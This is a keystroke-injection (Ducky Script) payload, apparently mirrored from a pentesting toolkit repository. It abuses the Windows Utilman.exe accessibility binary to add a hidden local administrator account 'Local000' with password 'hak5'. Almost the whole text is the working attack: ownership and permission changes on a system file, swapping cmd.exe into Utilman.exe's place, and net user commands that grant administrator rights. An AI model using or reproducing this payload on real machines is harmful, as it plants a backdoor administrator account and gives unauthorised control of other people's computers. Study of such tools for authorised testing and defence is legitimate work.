mirror of
https://github.com/autistic-symposium/sec-pentesting-toolkit.git
synced 2025-05-02 06:46:07 -04:00
93 lines
No EOL
1.3 KiB
Text
93 lines
No EOL
1.3 KiB
Text
Uses the Utilman.exe Exploit to create a new local administrator account “Local000” with the password “hak5”.
|
|
|
|
REM Author: Xcellerator
|
|
REM Description: Utilman Exploiter to create a new Admin Account
|
|
REM The new account will be called "Local000".
|
|
GUI
|
|
DELAY 50
|
|
STRING cmd
|
|
MENU
|
|
STRING a
|
|
ENTER
|
|
LEFT
|
|
ENTER
|
|
DELAY 200
|
|
STRING takeown /f "%systemroot%\System32\Utilman.exe"
|
|
ENTER
|
|
DELAY 50
|
|
STRING icacls "%systemroot%\System32\Utilman.exe" /grant administrators:F /T
|
|
ENTER
|
|
DELAY 50
|
|
STRING cd %systemroot%\System32
|
|
ENTER
|
|
DELAY 50
|
|
STRING mkdir util
|
|
ENTER
|
|
STRING xcopy cmd.exe util\
|
|
ENTER
|
|
DELAY 50
|
|
STRING ren Utilman.exe Utilman.exe.bak
|
|
ENTER
|
|
STRING cd util
|
|
ENTER
|
|
DELAY 50
|
|
STRING ren cmd.exe Utilman.exe
|
|
ENTER
|
|
DELAY 50
|
|
STRING cd ..
|
|
ENTER
|
|
DELAY 50
|
|
STRING xcopy util/Utilman.exe \
|
|
ENTER
|
|
DELAY 50
|
|
STRING rmdir /s /q util
|
|
ENTER
|
|
DELAY 50
|
|
STRING exit
|
|
ENTER
|
|
DELAY 50
|
|
GUI u
|
|
STRING net user Local000 /add
|
|
ENTER
|
|
DELAY 50
|
|
STRING net localgroup administrators Local000 /add
|
|
ENTER
|
|
DELAY 50
|
|
STRING exit
|
|
ENTER
|
|
DELAY 50
|
|
GUI r
|
|
STRING cmd
|
|
ENTER
|
|
DELAY 50
|
|
STRING cd "%systemroot%\System32"
|
|
ENTER
|
|
DELAY 50
|
|
STRING delete Utilman.exe
|
|
ENTER
|
|
DELAY 50
|
|
STRING y
|
|
ENTER
|
|
DELAY 50
|
|
STRING ren Utilman.exe.bak Utilman.exe
|
|
ENTER
|
|
DELAY 50
|
|
STRING exit
|
|
ENTER
|
|
GUI
|
|
STRING cmd
|
|
MENU
|
|
STRING a
|
|
ENTER
|
|
DELAY 50
|
|
LEFT
|
|
ENTER
|
|
DELAY 200
|
|
STRING net user Local000 *
|
|
ENTER
|
|
STRING hak5
|
|
ENTER
|
|
STRING hak5
|
|
ENTER
|
|
STRING exit
|
|
ENTER |